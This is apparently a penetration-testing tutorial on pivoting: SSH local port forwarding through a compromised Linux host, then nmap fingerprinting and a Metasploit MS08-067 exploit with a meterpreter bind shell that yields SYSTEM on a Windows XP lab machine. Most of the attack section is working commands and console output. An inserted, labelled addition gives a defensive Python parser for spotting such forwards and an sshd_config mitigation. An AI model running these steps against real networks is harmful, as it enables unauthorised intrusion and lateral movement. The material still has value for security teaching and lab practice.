SSH (Secure Shell) is a common encrypted protocol installed by default on almost all Linux hosts for remote administration. It gives administrators command-line access to run administrative tasks. Once a machine running SSH has been owned, it is trivial to use it to forward connections to other hosts securely. With OpenSSH, you have 3 methods of forwarding: local port forwarding (-L), remote port forwarding (-R) and SOCKS (-D). We will be using the first method.
Host A is a Linux host with OpenSSH installed by default. Host B is a Windows host without ssh.
Depiction of Hosts:

<Attacker host> ------------------- <Host A> -------------------- <Host B>
IP: 192.168.0.182                   eth0: 192.168.0.191           IP: 192.168.52.134
                                    eth1: 192.168.52.135
We assume that you have fully compromised Host A with root rights, so you already have the root credentials to ssh to Host A remotely; the objective is to further compromise Host B.
On Attacker Host
We map port 445 to localhost using ssh.
# ssh -L 445:192.168.52.134:445 root@192.168.0.191
root@192.168.0.191's password:
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
Last login: Tue Jun 20 05:59:22 2017
root@hostA:~#
Since we'll be exploiting Host B using msf, I would like to map the meterpreter port 4444
locally too. Extending the above command, we can forward 2 services in 1 command:
# ssh -L 445:192.168.52.134:445 -L 4444:192.168.52.134:4444 root@192.168.0.191
On another terminal on the attacker host, check your netstat:
# netstat -an | more
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:4444 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:445 0.0.0.0:* LISTEN
tcp 0 0 192.168.0.182:49620 192.168.0.191:22 ESTABLISHED
<--snip-->
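Added example, not part of the original post: a small Python parser for netstat output like the listing above that flags loopback listeners on watched ports when an outbound SSH session is also present, which is exactly the footprint an ssh -L forward leaves on the client side. The sample netstat text and the watched-port set are constructed assumptions.

```python
import re

# Constructed sample of "netstat -an" on the SSH client host, mirroring the write-up:
# two loopback listeners created by "ssh -L", the SSH session itself, and one benign line.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:4444          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:445           0.0.0.0:*               LISTEN
tcp        0      0 192.168.0.182:49620     192.168.0.191:22        ESTABLISHED
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
"""

# Ports whose appearance on loopback deserves a second look (assumption: tune per environment).
WATCHED_PORTS = {445, 4444}

# proto recv-q send-q laddr:lport faddr:fport state
LINE_RE = re.compile(r"^(tcp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\S+)\s+(\S+)")


def parse_netstat(text):
    """Return (proto, laddr, lport, faddr, fport, state) tuples for each TCP row."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            proto, laddr, lport, faddr, fport, state = m.groups()
            rows.append((proto, laddr, int(lport), faddr, fport, state))
    return rows


def find_suspected_forwards(text, watched=WATCHED_PORTS):
    """Pair loopback LISTEN sockets on watched ports with outbound SSH sessions.

    A local forward binds 127.0.0.1:<port> on the client and relays it through the
    client's ESTABLISHED connection to <server>:22, so seeing both together is the tell.
    """
    rows = parse_netstat(text)
    ssh_servers = [faddr for _, laddr, _, faddr, fport, state in rows
                   if state == "ESTABLISHED" and fport == "22" and not laddr.startswith("127.")]
    findings = []
    for _, laddr, lport, _, _, state in rows:
        if state == "LISTEN" and laddr.startswith("127.") and lport in watched:
            findings.append({"port": lport, "ssh_servers": ssh_servers})
    return findings


if __name__ == "__main__":
    for f in find_suspected_forwards(SAMPLE_NETSTAT):
        print(f"loopback listener on port {f['port']} alongside SSH session(s) to {f['ssh_servers']}")
```

On the server side (Host A here), setting AllowTcpForwarding no in sshd_config refuses -L, -R and -D forwards outright, which is the simplest mitigation when forwarding is not needed for administration.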
Now we have 2 ports mapped to localhost. Let's use nmap to fingerprint the OS of Host B; note
that port 445 on localhost is the forwarded connection to Host B, not a service listening on Host A:
# nmap -A -p 445 127.0.0.1
Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-20 09:16 SGT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000088s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows XP microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.8 - 4.6
Network Distance: 0 hops
Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 17h28m05s, deviation: 0s, median: 17h28m05s
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: tt-af6d434411ff
|   NetBIOS computer name: TT-AF6D434411FF
|   Workgroup: WORKGROUP
|_  System time: 2017-06-20T11:45:10-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds
Great! Now we can see the OS type is WinXP; let's use msf to exploit it using netapi:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
I changed the payload to bind_tcp instead of reverse_tcp because port 4444 is already
listening locally, and reverse_tcp won't work if it is.
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    127.0.0.1        yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     127.0.0.1        no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > run

[*] Started bind handler
[*] Sending stage (957487 bytes) to 127.0.0.1
[*] 127.0.0.1:445 - Automatically detecting the target...
[*] 127.0.0.1:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 127.0.0.1:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 127.0.0.1:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (127.0.0.1:40987 -> 127.0.0.1:4444) at 2017-06-20 09:31:22 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
There you go! Some people might ask, how do I portscan Host B from the attacker host? Unfortunately,
because Host B is a Windows machine and doesn't have OpenSSH installed, we can't set up the SOCKS
service using ssh. In that case, you have to rely on Host A directly to recon Host B.
In the next article, I will discuss about how to pivot from a Windows host.